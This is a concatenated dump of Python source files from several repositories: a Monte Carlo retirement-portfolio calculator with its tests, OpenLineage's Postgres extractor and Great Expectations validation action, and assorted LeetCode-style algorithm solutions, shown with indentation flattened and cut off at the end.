import random
import matplotlib
import time
from functools import wraps
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
matplotlib.use('TkAgg')
FIELDS = ('Annual Contribution','Annual Increase (In $)','Current Age', 'Retirement Age', 'Current Portfolio Value',
'Percent in Stocks (vs. Bonds)', 'Inflation')
AGE_SPREAD = [15]
STOCK_ALLOCATION = []
CURRENT_YEAR = 2018
STRATEGIES = {'Fixed Allocations', 'Shifting Bond Allocations'}
OFFSET = 1872
STOCK_MAP = dict()
BOND_MAP = dict()
with open('stock_history.txt') as stock_file:
STOCK_DATA = stock_file.readlines()
for year in range(OFFSET, CURRENT_YEAR-1):
STOCK_MAP[year] = STOCK_DATA[year-OFFSET]
with open('bond_history.txt') as bond_file:
BOND_DATA = bond_file.readlines()
for year in range(OFFSET, CURRENT_YEAR-1):
BOND_MAP[year] = BOND_DATA[year-OFFSET]
class Results:
""" The Results class holds the data from a signle simulation instance. """
def __init__(self, simulation_number, final_balance, growth_history):
self.simulation_number = simulation_number
self.final_balance = final_balance
self.growth_history = growth_history
class Investor:
""" The Investor class holds information that the user enters about themselves. """
def __init__(self, entries):
self.contribution = (float(entries['Annual Contribution'].get()))
self.current_age = (int(entries['Current Age'].get()))
self.retirement_age = (int(entries['Retirement Age'].get()))
self.starting_value = (float(entries['Current Portfolio Value'].get()))
self.stock_percentage = float(entries['Percent in Stocks (vs. Bonds)'].get())/100
self.contribution_increase = float(entries['Annual Increase (In $)'].get())
self.inflation = float(entries['Inflation'].get())/100
self.investment_timeline = int(self.retirement_age-self.current_age)
def get_final_balance(obj):
""" Takes in the data from a year and returns it's final balance. """
return obj.final_balance
def calculate_portfolio(entries, results_array):
"""
This is currently the main method for the program.
It uses nested while loops to simulate an investors lifetime (inner loop)
a certain number of times (outer loop)
and then output and graph the results.
"""
investor_values = Investor(entries)
STOCK_ALLOCATION.append(investor_values.stock_percentage)
portfolio_spread = [investor_values.starting_value]
balance = float(portfolio_spread[0])
matrix_length = investor_values.retirement_age - investor_values.current_age
matrix_height = 10000
data_matrix = create_matrix(matrix_length, matrix_height)
base_contribution = investor_values.contribution
for sim_count in range(10000):
iteration_age = investor_values.current_age
iteration_balance = balance
length_offset = investor_values.current_age
investor_values.contribution = base_contribution
for i in range(iteration_age, investor_values.retirement_age+1):
current_year_tuple = get_yearly_information(investor_values)
iteration_balance = update_balance(iteration_balance,
investor_values.contribution, current_year_tuple)
investor_values.contribution += investor_values.contribution_increase
data_matrix[sim_count][i-length_offset-1] = iteration_balance
result_object = Results(sim_count, data_matrix[sim_count][iteration_age-length_offset-1],
data_matrix[sim_count][:])
results_array.append(result_object)
quartile_tuple = get_quartile_data(10000)
plot_trendlines(quartile_tuple, results_array)
display_capital(investor_values.investment_timeline, investor_values.contribution, investor_values.starting_value)
def update_balance(iteration_balance, contribution, current_year_tuple):
""" Takes in a single year's data during a single simulation and updates the balance. """
STOCK_RATE = 0
BOND_RATE = 1
STOCK_PCT = 2
iteration_balance = iteration_balance + contribution
stock_balance = iteration_balance * current_year_tuple[STOCK_PCT]
bond_balance = iteration_balance * (1-current_year_tuple[STOCK_PCT])
stock_balance += (stock_balance * current_year_tuple[STOCK_RATE])
bond_balance += (bond_balance * current_year_tuple[BOND_RATE])
#print("Portfolio started at " + str(iteration_balance) + " and after a year of " + str(current_year_tuple[STOCK_RATE]) + " change it is now at: " + str(stock_balance + bond_balance))
iteration_balance = stock_balance + bond_balance
return iteration_balance
def get_quartile_data(number_of_simulations):
""" Take in the number of simulations and output the quartile line numbers. """
std_increment = round(number_of_simulations/100)
lower_quartile = round(std_increment*25)
middle_quartile = round(std_increment*50)
upper_quartile = round((std_increment*75))
quartile_tuple = (lower_quartile, middle_quartile, upper_quartile)
return quartile_tuple
def plot_trendlines(quartile_tuple, results_array):
""" Take in the line numbers to plot and output a plot of those lines. """
plt.clf()
LOWER = 0
MID = 1
UPPER = 2
sorted_results = sorted(results_array, key=get_final_balance)
plt.xlabel('Years of Growth')
plt.ylabel('Portfolio Value')
plt.title('Investment Growth Calculator')
smooth_lower = smooth_trendlines(quartile_tuple[LOWER], 100, sorted_results)
smooth_middle = smooth_trendlines(quartile_tuple[MID], 100, sorted_results)
smooth_upper = smooth_trendlines(quartile_tuple[UPPER], 100, sorted_results)
plt.plot(smooth_lower)
plt.plot(smooth_middle)
plt.plot(smooth_upper)
lower_result = round(smooth_lower[-1])
middle_result = round(smooth_middle[-1])
upper_result = round(smooth_upper[-1])
lower_string = str(format(lower_result, ",d"))
middle_string = str(format(middle_result, ",d"))
upper_string = str(format(upper_result, ",d"))
results_string = (" Bottom Quartile: $" + lower_string + " * Middle Quartile: $"
+ middle_string + " * Upper Quartile: $" + upper_string + " ")
PERFORMANCE_VAR.set(results_string)
def display_capital(investment_length, added_yearly, initial_capital):
total_capital = round(initial_capital + (investment_length*added_yearly))
formatted_capital = str(format(total_capital, ",d"))
results_string = ("Total Invesment Capital: $" + formatted_capital)
CAPITAL_VAR.set(results_string)
def smooth_trendlines(n_quartile, smooth_amount, sorted_results):
""" This averages the results of a quartile against it's neighbours. """
half = (smooth_amount) // 2
my_line = sorted_results[n_quartile].growth_history
for line in range(n_quartile-half, n_quartile+half):
other_line = sorted_results[line].growth_history
for i in range(len(my_line)):
my_line[i] += other_line[i]
for i in range(len(my_line)):
my_line[i] /= smooth_amount
return my_line
def create_matrix(length, height):
""" Creates a matrix to store data in using a certain length and height. """
matrix = [[0 for x in range(length)] for y in range(height)]
return matrix
def get_yearly_information(investor_information):
""" This function grabs stock/bond data from a random year. """
random_year = random.randint(1872, CURRENT_YEAR-2)
inflation = investor_information.inflation
stock_rate = float(STOCK_MAP[random_year])
bond_rate = float(BOND_MAP[random_year])
stock_percentage = float(STOCK_ALLOCATION[0])
year_tuple = (stock_rate-int(inflation), bond_rate-int(inflation), stock_percentage)
return year_tuple
def create_form(ROOT):
""" This creates the main form using tkinter. """
create_initial_figure()
create_performance_text()
ents = make_form(ROOT, FIELDS)
create_buttons(ents)
ROOT.wm_iconbitmap('images/money.ico')
def create_initial_figure():
""" This creates the graph on which the results are ploted. """
fig = plt.figure(1)
plt.ion()
plt.xlabel('Years of Growth')
plt.ylabel('Portfolio Value')
plt.title('Investment Growth Calculator')
canvas = FigureCanvasTkAgg(fig, master=ROOT)
plot_widget = canvas.get_tk_widget()
plot_widget.pack()
def make_form(ROOT, FIELDS):
""" This takes our FIELDS parameter and generates text boxes from them. """
entries = {}
for field in FIELDS:
row = tk.Frame(ROOT)
lab = tk.Label(row, width=22, text=field+": ", anchor='w')
ent = tk.Entry(row)
ent.insert(0, "0")
row.pack(side=tk.TOP, fill=tk.X, padx=5, pady=5)
lab.pack(side=tk.LEFT)
ent.pack(side=tk.RIGHT, expand=tk.YES, fill=tk.X)
entries[field] = ent
return entries
def create_buttons(ents):
""" This creates the buttons a user can interact with. """
button_2 = tk.Button(ROOT, text='Quit', command=ROOT.quit)
button_2.pack(side=tk.BOTTOM, padx=5, pady=5)
button_1 = tk.Button(ROOT, text='Calculate', command=(lambda e=ents: calculate_portfolio(e, [])))
button_1.pack(side=tk.BOTTOM, padx=5, pady=5)
def create_performance_text():
""" This creates the text describing how each of the quartiles ended up. """
global PERFORMANCE_VAR
global CAPITAL_VAR
PERFORMANCE_VAR = tk.StringVar()
PERFORMANCE_VAR.set("")
performance_label = tk.Label(textvariable=PERFORMANCE_VAR, font=(None, 15))
performance_label.pack(side=tk.TOP)
CAPITAL_VAR = tk.StringVar()
CAPITAL_VAR.set("")
capital_label = tk.Label(textvariable=CAPITAL_VAR, font=(None, 15))
capital_label.pack(side=tk.TOP)
if __name__ == '__main__':
ROOT = tk.Tk()
ROOT.wm_title("Portfolio Growth Estimator")
create_form(ROOT)
ROOT.mainloop()
```
#### File: JoshHumpherey/Financial_Calculators/pytests.py
```python
import unittest
from unittest.mock import patch
import investment_growth
class InvestmentGrowthTests(unittest.TestCase):
""" Unit tests for investment_growth.py """
def test_get_quartile_data(self):
""" This tests to make sure that the quartiles are divded correctly. """
LOWER = 0
MID = 1
UPPER = 2
number_of_simulations = 100
expected_lower = 25
expected_middle = 50
expected_upper = 75
quartile_tuple = investment_growth.get_quartile_data(number_of_simulations)
self.assertEqual(expected_lower, quartile_tuple[LOWER])
self.assertEqual(expected_middle, quartile_tuple[MID])
self.assertEqual(expected_upper, quartile_tuple[UPPER])
def test_update_balance(self):
""" Test to make sure the investor balance updates correctly. """
current_year_tuple = (0.1, 0.1, 0.8)
iteration_balance = 90
contribution = 10
expected_result = 110
test_balance = investment_growth.update_balance(iteration_balance, contribution, current_year_tuple)
self.assertEqual(test_balance, expected_result)
def test_create_matrix(self):
""" Tests to make sure matrices are correctly created. """
test_matrix = investment_growth.create_matrix(5, 2)
self.assertEqual(0, test_matrix[1][4])
with self.assertRaises(Exception):
test_matrix[2][5]
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joshi95/OpenLineage",
"score": 2
} |
#### File: airflow/extractors/postgres_extractor.py
```python
from contextlib import closing
from typing import Optional
from urllib.parse import urlparse
from airflow.hooks.postgres_hook import PostgresHook
from airflow.operators.postgres_operator import PostgresOperator
from openlineage.airflow.utils import get_normalized_postgres_connection_uri, get_connection
from openlineage.airflow.extractors.base import (
BaseExtractor,
StepMetadata
)
from openlineage.common.models import (
DbTableName,
DbTableSchema,
DbColumn
)
from openlineage.common.sql import SqlMeta, SqlParser
from openlineage.common.dataset import Source, Dataset
_TABLE_SCHEMA = 0
_TABLE_NAME = 1
_COLUMN_NAME = 2
_ORDINAL_POSITION = 3
# Use 'udt_name' which is the underlying type of column
# (ex: int4, timestamp, varchar, etc)
_UDT_NAME = 4
class PostgresExtractor(BaseExtractor):
operator_class = PostgresOperator
default_schema = 'public'
def __init__(self, operator):
super().__init__(operator)
self.conn = None
def extract(self) -> StepMetadata:
# (1) Parse sql statement to obtain input / output tables.
sql_meta: SqlMeta = SqlParser.parse(self.operator.sql, self.default_schema)
# (2) Get database connection
self.conn = get_connection(self._conn_id())
# (3) Default all inputs / outputs to current connection.
# NOTE: We'll want to look into adding support for the `database`
# property that is used to override the one defined in the connection.
source = Source(
scheme=self._get_scheme(),
authority=self._get_authority(),
connection_url=self._get_connection_uri()
)
database = self.operator.database
if not database:
database = self._get_database()
# (4) Map input / output tables to dataset objects with source set
# as the current connection. We need to also fetch the schema for the
# input tables to format the dataset name as:
# {schema_name}.{table_name}
inputs = [
Dataset.from_table(
source=source,
table_name=in_table_schema.table_name.name,
schema_name=in_table_schema.schema_name,
database_name=database
) for in_table_schema in self._get_table_schemas(
sql_meta.in_tables
)
]
outputs = [
Dataset.from_table_schema(
source=source,
table_schema=out_table_schema,
database_name=database
) for out_table_schema in self._get_table_schemas(
sql_meta.out_tables
)
]
return StepMetadata(
name=f"{self.operator.dag_id}.{self.operator.task_id}",
inputs=[ds.to_openlineage_dataset() for ds in inputs],
outputs=[ds.to_openlineage_dataset() for ds in outputs],
context={
'sql': self.operator.sql
}
)
def _get_connection_uri(self):
return get_normalized_postgres_connection_uri(self.conn)
def _get_scheme(self):
return 'postgres'
def _get_database(self) -> str:
if self.conn.schema:
return self.conn.schema
else:
parsed = urlparse(self.conn.get_uri())
return f'{parsed.path}'
def _get_authority(self) -> str:
if self.conn.host and self.conn.port:
return f'{self.conn.host}:{self.conn.port}'
else:
parsed = urlparse(self.conn.get_uri())
return f'{parsed.hostname}:{parsed.port}'
def _conn_id(self):
return self.operator.postgres_conn_id
def _information_schema_query(self, table_names: str) -> str:
return f"""
SELECT table_schema,
table_name,
column_name,
ordinal_position,
udt_name
FROM information_schema.columns
WHERE table_name IN ({table_names});
"""
def _get_hook(self):
return PostgresHook(
postgres_conn_id=self.operator.postgres_conn_id,
schema=self.operator.database
)
def _get_table_schemas(
self, table_names: [DbTableName]
) -> [DbTableSchema]:
# Avoid querying postgres by returning an empty array
# if no table names have been provided.
if not table_names:
return []
# Keeps tack of the schema by table.
schemas_by_table = {}
hook = self._get_hook()
with closing(hook.get_conn()) as conn:
with closing(conn.cursor()) as cursor:
table_names_as_str = ",".join(map(
lambda name: f"'{name.name}'", table_names
))
cursor.execute(
self._information_schema_query(table_names_as_str)
)
for row in cursor.fetchall():
table_schema_name: str = row[_TABLE_SCHEMA]
table_name: DbTableName = DbTableName(row[_TABLE_NAME])
table_column: DbColumn = DbColumn(
name=row[_COLUMN_NAME],
type=row[_UDT_NAME],
ordinal_position=row[_ORDINAL_POSITION]
)
# Attempt to get table schema
table_key: str = f"{table_schema_name}.{table_name}"
table_schema: Optional[DbTableSchema] = schemas_by_table.get(table_key)
if table_schema:
# Add column to existing table schema.
schemas_by_table[table_key].columns.append(table_column)
else:
# Create new table schema with column.
schemas_by_table[table_key] = DbTableSchema(
schema_name=table_schema_name,
table_name=table_name,
columns=[table_column]
)
return list(schemas_by_table.values())
```
#### File: provider/great_expectations/action.py
```python
import logging
import os
from collections import defaultdict
from datetime import datetime
from typing import Optional, List
from urllib.parse import urlparse
from uuid import uuid4
from great_expectations.checkpoint import ValidationAction
from great_expectations.core import ExpectationSuiteValidationResult
from great_expectations.data_context.types.resource_identifiers import ValidationResultIdentifier
from great_expectations.dataset import SqlAlchemyDataset, PandasDataset, Dataset as GEDataset
from openlineage.client import OpenLineageClient, OpenLineageClientOptions
from openlineage.client.facet import ParentRunFacet, DocumentationJobFacet, \
SourceCodeLocationJobFacet, DataQualityMetricsInputDatasetFacet, ColumnMetric
from openlineage.client.run import RunEvent, RunState, Run, Job
from sqlalchemy import MetaData, Table
from sqlalchemy.engine import Connection
from openlineage.client.serde import Serde
from openlineage.common.dataset import Dataset, Source, Field
from openlineage.common.dataset import Dataset as OLDataset
from openlineage.common.provider.great_expectations.facets import \
GreatExpectationsAssertionsDatasetFacet, \
GreatExpectationsRunFacet
from openlineage.common.provider.great_expectations.results import EXPECTATIONS_PARSERS, \
COLUMN_EXPECTATIONS_PARSER, \
GreatExpectationsAssertion
from openlineage.common.sql import SqlParser
class OpenLineageValidationAction(ValidationAction):
"""
ValidationAction implementation which posts RunEvents for a GreatExpectations validation job.
Openlineage host parameters can be passed in as constructor arguments or environment variables
will be searched. Job information can optionally be passed in as constructor arguments or the
great expectations suite name and batch identifier will be used as the job name
(the namespace should be passed in as either a constructor arg or as an environment variable).
The data_asset will be inspected to determine the dataset source- SqlAlchemy datasets and
Pandas datasets are supported. SqlAlchemy datasets are typically treated as other SQL data
sources in OpenLineage. The database host and database name are treated as the data "source"
and the schema + table are treated as the table name. Columns are fetched when possible and the
schema will be posted as a facet. Some special handling for Bigquery is included, as "bigquery"
is always the data source, while the table name consists of "project.dataset.table".
Both the GreatExpectationsAssertionsDatasetFacet and DataQualityDatasetFacet are attached to
*each* dataset found in the data_asset (this includes tables that are joined in a `custom_sql`
argument). The DataQualityDatasetFacet is also posted as the more standard OpenLineage
DataQualityMetricsInputDatasetFacet.
The resulting RunEvent is returned from the _run method, so it can be seen in the
actions_results field of the validation results.
"""
def __init__(self, data_context,
openlineage_host=None,
openlineage_namespace=None,
openlineage_apiKey=None,
openlineage_parent_run_id=None,
openlineage_parent_job_namespace=None,
openlineage_parent_job_name=None,
job_name=None,
job_description=None,
code_location=None,
openlineage_run_id=None,
do_publish=True):
super().__init__(data_context)
if openlineage_host is not None:
self.openlineage_client = OpenLineageClient(openlineage_host,
OpenLineageClientOptions(
api_key=openlineage_apiKey))
else:
self.openlineage_client = OpenLineageClient.from_environment()
if openlineage_namespace is not None:
self.namespace = openlineage_namespace
else:
self.namespace = os.getenv('OPENLINEAGE_NAMESPACE', 'default')
if openlineage_run_id is not None:
self.run_id = openlineage_run_id
else:
self.run_id = uuid4()
self.parent_run_id = openlineage_parent_run_id
self.parent_job_namespace = openlineage_parent_job_namespace
self.parent_job_name = openlineage_parent_job_name
self.job_name = job_name
self.job_description = job_description
self.code_location = code_location
self.do_publish = do_publish
def _run(self, validation_result_suite: ExpectationSuiteValidationResult,
validation_result_suite_identifier: ValidationResultIdentifier,
data_asset: GEDataset,
payload=None):
# Initialize logger here so that the action is serializable until it actually runs
self.log = logging.getLogger(self.__class__.__module__ + '.' + self.__class__.__name__)
datasets = []
if isinstance(data_asset, SqlAlchemyDataset):
datasets = self._fetch_datasets_from_sql_source(data_asset, validation_result_suite)
elif isinstance(data_asset, PandasDataset):
datasets = self._fetch_datasets_from_pandas_source(data_asset, validation_result_suite)
run_facets = {}
if self.parent_run_id is not None:
run_facets.update({"parentRun": ParentRunFacet.create(
self.parent_run_id,
self.parent_job_namespace,
self.parent_job_name
)})
run_facets.update(
{"great_expectations_meta": GreatExpectationsRunFacet(**validation_result_suite.meta)})
job_facets = {}
if self.job_description:
job_facets.update({
"documentation": DocumentationJobFacet(self.job_description)
})
if self.code_location:
job_facets.update({
"sourceCodeLocation": SourceCodeLocationJobFacet("", self.code_location)
})
job_name = self.job_name
if self.job_name is None:
job_name = validation_result_suite.meta["expectation_suite_name"] + '.' \
+ validation_result_suite_identifier.batch_identifier
run_event = RunEvent(
eventType=RunState.COMPLETE,
eventTime=datetime.now().isoformat(),
run=Run(runId=str(self.run_id), facets=run_facets),
job=Job(self.namespace, job_name, facets=job_facets),
inputs=datasets,
outputs=[],
producer="https://github.com/OpenLineage/OpenLineage/tree/$VERSION/integration/common/openlineage/provider/great_expectations" # noqa
)
if self.do_publish:
self.openlineage_client.emit(run_event)
# Great expectations tries to append stuff here, so we need to make it a dict
return Serde.to_dict(run_event)
def _fetch_datasets_from_pandas_source(self, data_asset: PandasDataset,
validation_result_suite: ExpectationSuiteValidationResult) -> List[OLDataset]: # noqa
"""
Generate a list of OpenLineage Datasets from a PandasDataset
:param data_asset:
:param validation_result_suite:
:return:
"""
if data_asset.batch_kwargs.__contains__("path"):
path = data_asset.batch_kwargs.get("path")
if path.startswith("/"):
path = "file://{}".format(path)
parsed_url = urlparse(path)
columns = [Field(
name=col,
type=str(data_asset[col].dtype) if data_asset[col].dtype is not None else 'UNKNOWN'
) for col in data_asset.columns]
return [
Dataset(
source=self._source(parsed_url._replace(path='')),
name=parsed_url.path,
fields=columns,
input_facets=self.results_facet(validation_result_suite)
).to_openlineage_dataset()
]
def _fetch_datasets_from_sql_source(self, data_asset: SqlAlchemyDataset,
validation_result_suite: ExpectationSuiteValidationResult) -> List[OLDataset]: # noqa
"""
Generate a list of OpenLineage Datasets from a SqlAlchemyDataset.
:param data_asset:
:param validation_result_suite:
:return:
"""
metadata = MetaData()
if data_asset.generated_table_name is not None:
custom_sql = data_asset.batch_kwargs.get('query')
parsed_sql = SqlParser.parse(custom_sql)
return [
self._get_sql_table(data_asset, metadata, t.schema, t.name,
validation_result_suite) for t in
parsed_sql.in_tables
]
return [self._get_sql_table(data_asset, metadata, data_asset._table.schema,
data_asset._table.name,
validation_result_suite)]
def _get_sql_table(self, data_asset: SqlAlchemyDataset,
meta: MetaData,
schema: str,
table_name: str,
validation_result_suite: ExpectationSuiteValidationResult) -> Optional[OLDataset]: # noqa
"""
Construct a Dataset from the connection url and the columns returned from the
SqlAlchemyDataset
:param data_asset:
:return:
"""
engine = data_asset.engine
if isinstance(engine, Connection):
engine = engine.engine
datasource_url = engine.url
if engine.dialect.name.lower() == "bigquery":
schema = '{}.{}'.format(datasource_url.host, datasource_url.database)
table = Table(table_name, meta, autoload_with=engine)
fields = [Field(
name=key,
type=str(col.type) if col.type is not None else 'UNKNOWN',
description=col.doc
) for key, col in table.columns.items()]
name = table_name \
if schema is None \
else "{}.{}".format(schema, table_name)
results_facet = self.results_facet(validation_result_suite)
return Dataset(
source=self._source(urlparse(str(datasource_url))),
fields=fields,
name=name,
input_facets=results_facet
).to_openlineage_dataset()
def _source(self, url) -> Source:
"""
Construct a Source from the connection url. Special handling for BigQuery is included.
We attempt to strip credentials from the connection url, if present.
:param url: a parsed url, as returned from urlparse()
:return:
"""
if url.scheme == "bigquery":
return Source(
scheme='bigquery',
connection_url='bigquery'
)
return Source(
scheme=url.scheme,
authority=url.hostname,
# Remove credentials from the URL if present
connection_url=url._replace(netloc=url.hostname, query=None, fragment=None).geturl()
)
def results_facet(self, validation_result: ExpectationSuiteValidationResult):
"""
Parse the validation result and extract input facets based on the results. We'll return a
DataQualityDatasetFacet, a GreatExpectationsAssertionsDatasetFacet, and a
(openlineage standard) DataQualityMetricsInputDatasetFacet
:param validation_result:
:return:
"""
try:
data_quality_facet = self.parse_data_quality_facet(validation_result)
if not data_quality_facet:
return None
assertions_facet = self.parse_assertions(validation_result)
if not assertions_facet:
return None
return {
'dataQuality': data_quality_facet,
'greatExpectations_assertions': assertions_facet,
'dataQualityMetrics': data_quality_facet
}
except ValueError:
self.log.exception("Exception while retrieving great expectations dataset")
return None
def parse_data_quality_facet(self, validation_result: ExpectationSuiteValidationResult) \
-> Optional[DataQualityMetricsInputDatasetFacet]:
"""
Parse the validation result and extract a DataQualityDatasetFacet
:param validation_result:
:return:
"""
facet_data = {
"columnMetrics": defaultdict(dict)
}
# try to get to actual expectations results
try:
expectations_results = validation_result['results']
for expectation in expectations_results:
for parser in EXPECTATIONS_PARSERS:
# accept possible duplication, should have no difference in results
if parser.can_accept(expectation):
result = parser.parse_expectation_result(expectation)
facet_data[result.facet_key] = result.value
for parser in COLUMN_EXPECTATIONS_PARSER:
if parser.can_accept(expectation):
result = parser.parse_expectation_result(expectation)
facet_data['columnMetrics'][result.column_id][result.facet_key] \
= result.value
for key in facet_data['columnMetrics'].keys():
facet_data['columnMetrics'][key] = ColumnMetric(**facet_data['columnMetrics'][key])
return DataQualityMetricsInputDatasetFacet(**facet_data)
except ValueError:
self.log.exception(
"Great Expectations's CheckpointResult object does not have expected key"
)
return None
def parse_assertions(self, validation_result: ExpectationSuiteValidationResult) -> \
Optional[GreatExpectationsAssertionsDatasetFacet]:
assertions = []
try:
for expectation in validation_result.results:
assertions.append(GreatExpectationsAssertion(
expectationType=expectation['expectation_config']['expectation_type'],
success=expectation['success'],
column=expectation['expectation_config']['kwargs'].get('column', None)
))
return GreatExpectationsAssertionsDatasetFacet(assertions)
except ValueError:
self.log.exception(
"Great Expectations's CheckpointResult object does not have expected key"
)
return None
``` |
{
"source": "joshiaj7/CodingChallenges",
"score": 3
} |
#### File: CodingChallenges/python3/add_binary.py
```python
class Solution:
def addBinary(self, a: str, b: str) -> str:
res = ''
len_a = len(a)
len_b = len(b)
store = 0
if len_a > len_b:
b = ('0' * (len_a - len_b)) + b
len_b = len_a
elif len_a < len_b:
a = ('0' * (len_b - len_a)) + a
len_a = len_b
for i in range(len_a-1, -1, -1):
total = store + int(a[i]) + int(b[i])
if total < 2:
store = 0
elif total >= 2:
store = 1
res = str(total % 2) + res
if store == 1:
res = str(store) + res
return res
```
#### File: CodingChallenges/python3/add_digits.py
```python
class Solution:
def addDigits(self, num: int) -> int:
if num < 10:
return num
while len(str(num)) > 1:
n = str(num)
temp = 0
for i in n:
temp += int(i)
num = temp
return num
```
#### File: CodingChallenges/python3/add_two_numbers.py
```python
from .model import ListNode
"""
Space : O(1)
Time : O(n)
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
p1, p2 = l1, l2
v1, v2 = 0, 0
mul = 1
while p1:
v1 = v1 + (p1.val * mul)
mul *= 10
p1 = p1.next
mul = 1
while p2:
v2 = v2 + (p2.val * mul)
mul *= 10
p2 = p2.next
tot = str(v1 + v2)
ans = ListNode(0)
point = ans
for i in range(len(tot)-1, -1, -1):
point.next = ListNode(int(tot[i]))
point = point.next
return ans.next
```
#### File: CodingChallenges/python3/arithmetic_slices.py
```python
class Solution:
def numberOfArithmeticSlices(self, A: List[int]) -> int:
ans = 0
temp = []
n = len(A)
if n < 3:
return 0
for i in range(1, n):
temp.append(A[i] - A[i-1])
count = 0
for j in range(1, len(temp)):
if temp[j] == temp[j-1]:
count += 1
else:
count = 0
ans += count
return ans
```
#### File: CodingChallenges/python3/arrange_coins.py
```python
class Solution:
def arrangeCoins(self, n: int) -> int:
ans, count = 0, 0
add = 1
while count < n:
count += add
add += 1
ans += 1
if count > n:
ans -= 1
return ans
```
#### File: CodingChallenges/python3/asteroid_collision.py
```python
class Solution:
def asteroidCollision(self, asteroids: List[int]) -> List[int]:
stack = []
for e in asteroids:
if not stack or stack[-1] < 0 or e > 0:
stack.append(e)
else:
flag = True
while stack and stack[-1] > 0 and stack[-1] <= -e:
tmp = stack.pop()
if tmp == -e:
flag = False
break
if (not stack or stack[-1] < 0) and flag:
stack.append(e)
return stack
```
#### File: CodingChallenges/python3/average_of_levels_in_binary_tree.py
```python
class Solution:
def averageOfLevels(self, root: TreeNode) -> List[float]:
ans = []
stack = [root]
while stack:
val = 0
temp = []
for node in stack:
val += node.val
if node.left:
temp.append(node.left)
if node.right:
temp.append(node.right)
ans.append(val / len(stack))
stack = temp
return ans
```
#### File: CodingChallenges/python3/bag_of_tokens.py
```python
class Solution:
def bagOfTokensScore(self, tokens: List[int], P: int) -> int:
score = 0
n = len(tokens)
dp = [0] * n
tokens = sorted(tokens)
s, e = 0, len(tokens)-1
while s <= e:
if P - tokens[s] >= 0:
P -= tokens[s]
dp[s] += 1
s += 1
score += 1
else:
if score > 0:
cost = 0
while P < tokens[s]:
P += tokens[e]
score -= 1
cost += 1
e -= 1
if score == 0:
break
dp[s] -= cost
else:
break
ans = 0
count = 0
for i in dp:
count += i
ans = max(ans, count)
return ans
```
#### File: CodingChallenges/python3/beautiful_arrangement_II.py
```python
class Solution:
def constructArray(self, n: int, k: int) -> List[int]:
s, e = 2, n
ans = [1]
while s <= e:
if k > 1:
if ans[-1] == s-1:
ans.append(e)
e -= 1
elif ans[-1] == e+1:
ans.append(s)
s += 1
k -= 1
else:
if ans[-1] == s-1:
ans.append(s)
s += 1
elif ans[-1] == e+1:
ans.append(e)
e -= 1
return ans
```
#### File: CodingChallenges/python3/beautiful_arrangement.py
```python
class Solution:
def countArrangement(self, n: int) -> int:
ans = 0
def dfs(i, cands):
nonlocal ans
if i <= 1:
ans += 1
return
for j, x in enumerate(cands):
if i % x == 0 or x % i == 0:
dfs(i-1, cands[:j] + cands[j+1:])
dfs(n, list(range(1, n+1)))
return ans
```
#### File: CodingChallenges/python3/best_time_stock1.py
```python
class Solution:
def maxProfit(self, prices: List[int]) -> int:
start, dp = 10**10, 0
for i in prices:
print(start)
start = min(start, i)
dp = max(dp, i-start)
return dp
```
#### File: CodingChallenges/python3/binary_number_with_alternating_bits.py
```python
class Solution:
def hasAlternatingBits(self, n: int) -> bool:
if n <= 1:
return True
bit = bin(n)[2:]
truth = bit[0]
for i in range(1, len(bit)):
if bit[i] != truth:
truth = bit[i]
else:
return False
return True
```
#### File: CodingChallenges/python3/binary_tree_level_order_traversal_ii.py
```python
from .model import TreeNode
"""
Space : O(n)
Time : O(n)
"""
class Solution:
def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
ans = []
stack = [root]
while stack:
temp = []
l = []
for x in stack:
l.append(x.val)
if x.left:
temp.append(x.left)
if x.right:
temp.append(x.right)
ans.insert(0, l)
stack = temp
return ans
```
#### File: CodingChallenges/python3/boats_to_save_people.py
```python
class Solution:
def numRescueBoats(self, people: List[int], limit: int) -> int:
"""
Beats 10%
Time : O(n)
Space : O(n)
"""
ans = 0
d = {}
max_w, min_w = 0, 30000
for x in people:
if x not in d:
d[x] = 1
else:
d[x] += 1
max_w = max(max_w, x)
min_w = min(min_w, x)
for i in range(min_w, max_w):
if i not in d:
d[i] = 0
s, e = min_w, max_w
while s < e:
if s + e > limit:
ans += d[e]
d[e] = 0
e -= 1
else:
if d[s] == 0:
s += 1
continue
if d[e] == 0:
e -= 1
continue
slices = min(d[s], d[e])
ans += slices
d[s] -= slices
d[e] -= slices
if d[s] == 0:
s += 1
if d[e] == 0:
e -= 1
if d[s] > 0:
if 2 * s <= limit:
ans += d[s] // 2
ans += d[s] % 2
else:
ans += d[s]
return ans
def numRescueBoatsBest(self, people: List[int], limit: int) -> int:
"""
Beats 30%
Time : O(n log n)
Space : O(1)
"""
ans = 0
people.sort()
s, e = 0, len(people)-1
while s <= e:
if people[s] + people[e] <= limit:
s += 1
e -= 1
ans += 1
return ans
```
#### File: CodingChallenges/python3/build_baloon_from_letters.py
```python
def solution(S):
ans = 0
truthmap = {
'B': 1,
'A': 1,
'L': 2,
'O': 2,
'N': 1,
}
hashmap = {}
for i in S:
if i not in hashmap:
hashmap[i] = 1
else:
hashmap[i] += 1
exist = True
while exist:
for key, val in truthmap.items():
if key in hashmap:
if hashmap[key] - val >= 0:
hashmap[key] -= val
else:
exist = False
break
else:
exist = False
if exist:
ans += 1
return ans
print(solution("BALLOONBALLOONXXBALON"))
print(solution("ALEMEN"))
```
#### File: CodingChallenges/python3/bulls_and_cows.py
```python
class Solution:
def getHint(self, secret: str, guess: str) -> str:
hashmap = {}
A, B = 0, 0
guess = list(guess)
for x in secret:
if x not in hashmap:
hashmap[x] = 1
else:
hashmap[x] += 1
for i in range(len(secret)):
if secret[i] == guess[i]:
A += 1
hashmap[secret[i]] -= 1
guess[i] = 'x'
for y in guess:
if y == 'x':
continue
if y in hashmap:
if hashmap[y] > 0:
hashmap[y] -= 1
B += 1
return "{}A{}B".format(A, B)
```
#### File: CodingChallenges/python3/climbing_stairs.py
```python
class Solution:
def climbStairs(self, n: int) -> int:
dp = [0] * 3
dp[0] = 1
dp[1] = 1
dp[2] = 2
if n < 3:
return dp[n]
dp = dp + ([0] * (n-2))
for i in range(3, n+1):
dp[i] = dp[i-1] + dp[i-2]
return dp[n]
```
#### File: CodingChallenges/python3/combination_sum_3.py
```python
from itertools import combinations
"""
Space : O(n)
Time : O(n!)
